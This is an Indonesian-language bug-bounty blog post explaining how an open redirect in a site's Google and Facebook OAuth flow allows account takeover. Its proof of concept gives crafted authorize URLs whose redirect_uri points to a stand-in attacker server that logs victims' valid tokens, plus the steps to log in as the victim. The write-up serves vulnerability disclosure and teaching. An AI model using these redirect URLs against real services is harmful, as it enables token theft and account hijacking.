Assalamu’alaikum wr. wb.

Salam semangat untuk sobat progress dimanapun anda berada, kembali lagi bersama saya rootbakar yang akan berbagi postingan-postingan menarik terkait Bug Bounty.

Oke pada kesempatan yang baik kali ini saya akan membagikan postingan terkait bug Unvalidated redirect and forward atau yang lebih dikenal dengan Open Redirect sampai berhasil melakukan ATO atau yang lebih dikenal dengan Account Takeover. nah pasti sobat progress bertanya kan apa sih open redirect dan ATO itu…???

Open Redirect sendiri merupakan sebuah serangan yang memungkinkan seseorang untuk mengalihkan user lain ke halaman website lain dengan menumpangi website yang vulnerable terhadap open redirect. Website yang digunakan untuk pengalihan pada umunya yaitu website phishing, malicious site, atau website lain yang sifatnya berbahaya. Open Redirect juga bisa dieskalasi untuk mencuri token, XSS dan lain-lain yang pada umumnya membutuhkan teknik tambahan sesuai dengan website dan method pada jenis open redirect yang di dapatkan, apakah itu post method atau get method.

Sedangkan Account Takeover sendiri merupakan sebuah serangan yang memungkinkan seseorang untuk mengambil alih akun orang lain dengan berbagai cara yang tersedia di internet, bisa dengan menggunakan brute force, idor, bypass authentification dan lain-lain.

Lebih jelas sobat progress bisa membaca beberapa tulisan lain di bawah ini yang menjelaskan tentang Open Redirect dan ATO:

SUMMARY

Bug ini hanya memanfaatkan kesalah pemrosesan pada fitur Google dan Facebook OAuth yang saat ini digunakan pada sistem redacted.ltd. Dimana memungkinkan seorang attacker untuk mendapatkan valid token dari seorang victim dengan memanipulasi sebuah URL Google dan Facebook OAuth seperti pada link di bawah ini

http://auth.redacted.ltd/oauth2/authorize/google?redirect_uri=http://attacker_server/poc/google_redirect.php (untuk google oauth)

dan

http://auth.redacted.ltd/oauth2/authorize/facebook?redirect_uri=http://attacker_server/poc/facebook_redirect.php (untuk facebook oauth)

Nantinya seorang user yang terkena dampak akan secara otomatis teralihkan ke halaman website itu sendiri dan valid token akan tercapture di server milik attacker dalam satu file dengan nama google_valid_token_log.txt atau facebook_valid_token_log.txt kemudian nantinya attacker dapat langsung menggunakan valid token tersebut untuk masuk ke akun korban tanpa perlu melakukan login dengan username dan password terlebih dahulu.

Tujuan victim dialihkan ke halaman website itu sendiri adalah untuk mengurangi kecurigaan victim akan dirinya sudah masuk perangkat jebakan dan pengiriman valid token secara otomatis ke server target setelah dilakukan pemrosesan validasi dari OAuth itu sendiri.

Okay lebih jelas silahkan lihat poc di bawah ini…..

POC

  1. Attacker mengirimkan link http://auth.redacted.ltd/oauth2/authorize/google?redirect_uri=http://attacker_server/poc/google_redirect.php atau http://auth.redacted.ltd/oauth2/authorize/facebook?redirect_uri=http://attacker_server/poc/facebook_redirect.php kepada victim
  2. Victim mengakses link
  3. Victim berhasil login namun victim tidak mengetahui jika token victim sudah tercapture pada server attacker dan tersimpan dalam file google_valid_token_log.txt atau facebook_valid_token_log.txt
  4. Attacker berhasil mendapatkan Valid Token milik Victim
  5. Attacker menggunakan Valid Token
  6. Attacker berhasil masuk ke akun Victim

SCREENSHOT

IMPACT

Mengambil alih akun orang lain

Terimakasih sudah menyempatkan untuk membaca postingan saya ini semoga menginspirasi dan membantu sobat progress dalam menemukan bug-bug serupa pada sebuah platform bug bounty dan Jangan lupa sempatkan sedikit waktunya untuk subscribe youtube kami yah di Progress28. Salam semangat dan Happy Hunting.